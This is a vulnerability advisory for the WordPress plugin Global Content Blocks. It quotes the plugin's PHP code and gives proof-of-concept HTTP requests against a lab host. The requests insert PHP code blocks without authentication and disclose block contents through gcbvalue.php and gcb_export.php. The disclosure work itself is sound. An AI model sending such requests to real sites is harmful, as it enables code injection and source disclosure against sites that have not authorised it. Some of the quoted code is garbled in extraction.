Advisory
Secunia Advisory SA 49854
Analysis of gcb_ajax_add.php vulnerability
A part of the admin interface for this plugin allows you to insert a “content block”, which can be used across WordPress to contain reusable blocks of content and PHP code. It does so by making a POST call to /resources/tinymce/gcd_ajax_add.php. Let’s have a quick look at that to see how it works.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
require_once('../../../../../wp-load.php'); global $wpdb; if(!isset($_POST["name"]) || !isset($_POST["content"])) {die("invalid call!");} $name = $_POST["name"]; $description = mysql_real_escape_string(htmlspecialchars($_POST['description'])); $type = mysql_real_escape_string(htmlspecialchars($_POST['type'])); $value = mysql_real_escape_string(htmlspecialchars($_POST['content'])); if(!strlen($name) || !strlen($value)) {die("invalid call!");} $available_types = array( "other"=>array("vname"=>"General","img"=>"gcb.png","help"=>"Content block"), "adsense"=>array("vname"=>"Adsense","img"=>"adsense.png","help"=>"Adsense code"), "code"=>array("vname"=>"Code","img"=>"code.png","help"=>"Programming code"), "form"=>array("vname"=>"Form","img"=>"form.png","help"=>"General form"), "html"=>array("vname"=>"HTML","img"=>"html.png","help"=>"Raw HTML code"), "iframe"=>array("vname"=>"Iframe","img"=>"iframe.png","help"=>"Iframe code"), "optin"=>array("vname"=>"Opt-In Form","img"=>"optin.png","help"=>"Opt-In form code"), "php"=>array("vname"=>"PHP Code","img"=>"php.png","help"=>"PHP code (without <!--?php, <?, ?--> tags)"), ); $wpdb->query("insert into ".$wpdb->prefix . "gcb (name,description,value,type) VALUES ('".$name."','".$description."','".$value."','".$type."')"); $inserted_id = mysql_insert_id(); $return = array( "id"=>$inserted_id, "name"=>$name, "img"=>$available_types[$type]["img"] ); echo json_encode($return);die(); |
So it starts by doing some initializations, validate that all the input is there that it needs, and do mostly best-practice sanitization. It then inserts the value into a database and returns the same value back in json format. The problem here is that at no point has the script checked that the calling user is logged in, and is an admin(This is important because it allows for inserting PHP code, which could cause an arbitrary code execution).
It does sanitization of all values but the name, but as it turns out this is all output encoded in the admin interface. But we’re still able to insert arbitrary content into the table without authentication, which could be bad due to the possibility of PHP code being inserted. This can be exploited like this:
|
1 2 3 4 5 6 |
POST /wordpress/wp-content/plugins/global-content-blocks/resources/tinymce/gcb_ajax_add.php HTTP/1.1 Host: 192.168.80.130 Content-Type: application/x-www-form-urlencoded Content-Length: 129 name=My malicious request&content=echo 'Hello buddy', nice day';&type=php&description=This is really not malicious code, I swear. |
Analysis of gdbvalue.php vulnerability
Another part of the admin interface is used to fetch the value of a content block, i.e the php code or other trip of content that may be reused on pages. In cases where it is php code, source code disclosure is a concern. The next 3 vulnerabilities allows for disclosure of block contents. The first one is in [/resources/tinymce/gcbvalue.php](http://plugins.svn.wordpress.org/global-content-blocks/tags/1.5.1/resources/tinymce/gcbvalue.php):
|
1 2 3 4 5 |
if(!isset($_POST["id"]) || intval($_POST["id"])get_row("select value from ".$wpdb->prefix."gcb where id=".$gcb_id); if($val!==null) { echo stripslashes(htmlspecialchars_decode($val->value)); } die(); |
We see some validation of the input id to prevent SQL injection, and then a SQL query which will be used to print out the value(Code/markup) to the page. There is no validation that the caller is an admin, which means we can fetch the value(Which can be PHP code) with a simple HTTP request
|
1 2 3 4 5 6 |
POST /wordpress/wp-content/plugins/global-content-blocks/resources/tinymce/gcbvalue.php HTTP/1.1 Host: 192.168.80.130 Content-Type: application/x-www-form-urlencoded Content-Length: 4 id=1 |
This will disclose the contents of the block, which may contain PHP code that may contain secrets.
Analysis of gcb_export.php vulnerability
A feature that the admin panel of this plugin is that it will export the block defined for easy import into another blog. It does so by calling /gcb/gcb_export.php, which forces the browser to download a .gcb file which contains base64 encoded content.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
if(!isset($_GET["gcb"])) (die("Please select some values")); require_once('../../../../wp-load.php'); global $wpdb; $ids = explode(";",$_GET["gcb"]); $final_text = array(); foreach($ids as $id) { if(intval($id)>0) { $entry = $wpdb->get_row("select * from ".$wpdb->prefix."gcb where id=".intval(mysql_real_escape_string($id))); $final_text[] = base64_encode($entry->name)."". base64_encode($entry->description)."". base64_encode($entry->value)."". base64_encode($entry->type); } } |
Again there is a lack of validation that the user is logged in and has sufficient privileges to view this data normally. And because it may contain php code that is sensitive, it offers a source code disclosure vulnerability we can exploit like this. Note the semi-colon separated id list, which makes this very handy.
|
1 2 |
GET /wordpress/wp-content/plugins/global-content-blocks/gcb/gcb_export.php?gcb=1;2;3 HTTP/1.1 Host: 192.168.80.130 |